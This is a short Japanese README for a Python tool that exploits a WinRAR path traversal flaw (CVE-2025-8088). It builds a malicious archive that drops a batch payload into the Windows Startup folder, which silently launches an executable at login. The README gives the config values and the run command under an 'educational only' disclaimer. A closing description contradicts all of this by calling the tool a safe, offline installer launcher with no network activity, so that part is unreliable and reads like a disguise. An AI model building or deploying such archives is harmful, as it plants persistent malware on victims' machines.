⚠ このツールは教育目的のみで作成されています。管理された環境外での無断使用は固く禁じられています。
複数の相対ディレクトリレベルを使用して、抽出場所に関係なく確実に実行できるように、Windows スタートアップフォルダーに実行可能ペイロードを配置する悪意のあるアーカイブを生成することにより、WinRAR のパストラバーサル脆弱性 CVE-2025-8088 を悪用する Python スクリプトです。
config.py ファイルを設定します
# Configuration
DECOY_FILE_NAME = "document"
DROP_PATH = "AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.bat"
PAYLOAD = "@echo off\nstart /B C:\Users\Public\file.exe\n"
独自のデコイファイルを使用するには、名前の代わりに完全なパスを入力してください。
スクリプトを実行します:
python CVE-2025-8088.py
出力は output フォルダーに表示されます。
このツールは教育目的のみで作成されています。管理された環境外での無断使用は固く禁じられています。
作者: Desert Scripts
説明:
ローカルのオフラインランチャーで、MyAppInstaller.exe を実行します。
ネットワークアクティビティはありません。安全で透過的です。